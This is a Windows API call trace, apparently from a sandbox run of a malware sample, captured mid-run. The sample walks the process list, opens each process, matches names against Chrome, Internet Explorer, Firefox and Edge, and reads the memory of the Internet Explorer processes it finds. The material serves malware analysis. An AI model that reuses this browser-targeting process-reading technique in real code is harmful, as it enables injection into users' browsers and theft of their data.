	[0248.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.907] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.907] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0248.908] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x9d58
	[0248.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.908] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0248.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.908] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.909] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0248.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.909] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.909] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0248.910] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x9d5c
	[0248.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.910] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0248.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.911] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.911] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0248.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.912] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.912] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0248.913] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x9d60
	[0248.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.913] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0248.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.913] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.914] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0248.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.914] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.914] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0248.915] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x9d64
	[0248.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.915] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0248.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.916] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.916] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0248.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.916] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.917] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0248.918] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x9d68
	[0248.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.918] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0248.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.918] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.919] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0248.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.919] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.919] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0248.920] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x9d6c
	[0248.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.920] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0248.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.921] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.921] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0248.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.921] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.921] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0248.922] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x9d70
	[0248.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.922] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0248.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.922] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.923] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0248.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.923] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.923] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0248.924] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x9d74
	[0248.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.924] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0248.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.925] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.925] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0248.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.926] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.926] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0248.927] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x9d78
	[0248.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.927] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0248.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.927] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.928] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0248.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.929] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.929] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0248.930] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x9d7c
	[0248.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.931] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0248.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.931] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.931] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0248.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.932] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.932] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0248.933] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x9d80
	[0248.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.933] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0248.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.934] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.934] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0248.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.935] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.936] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0248.936] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x9d84
	[0248.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.937] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0248.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.937] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.938] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0248.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.938] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.938] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0248.939] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x9d88
	[0248.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.939] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0248.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.940] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0248.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.940] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0248.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.940] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.941] NtQueryInformationProcess (in: ProcessHandle=0x9d88, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0248.941] ReadProcessMemory (in: hProcess=0x9d88, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0248.941] ReadProcessMemory (in: hProcess=0x9d88, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0248.941] ReadProcessMemory (in: hProcess=0x9d88, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0248.941] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0248.941] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0248.942] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x9d8c
	[0248.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.942] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0248.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.943] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0248.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.943] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0248.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.943] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.943] NtQueryInformationProcess (in: ProcessHandle=0x9d8c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0248.943] ReadProcessMemory (in: hProcess=0x9d8c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0248.943] ReadProcessMemory (in: hProcess=0x9d8c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0248.944] ReadProcessMemory (in: hProcess=0x9d8c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0248.944] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0248.944] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0248.945] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x9d90
	[0248.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.945] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0248.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.945] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.946] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0248.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.946] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.946] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0248.947] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x9d94
	[0248.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.947] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0248.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.947] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.948] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0248.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.948] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.948] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.949] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x9d98
	[0248.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.949] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.950] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.950] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.950] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.950] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.951] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.952] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x9d9c
	[0248.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.952] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.952] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.953] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.953] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.953] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.954] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x9da0
	[0248.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.954] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.955] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.955] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.955] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.955] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0248.956] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x9da4
	[0248.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.956] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0248.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.957] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.957] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0248.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.957] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.958] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.958] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x9da8
	[0248.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.959] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.959] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.959] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.960] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.960] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.960] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x9dac
	[0248.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.961] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.961] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.961] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.962] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
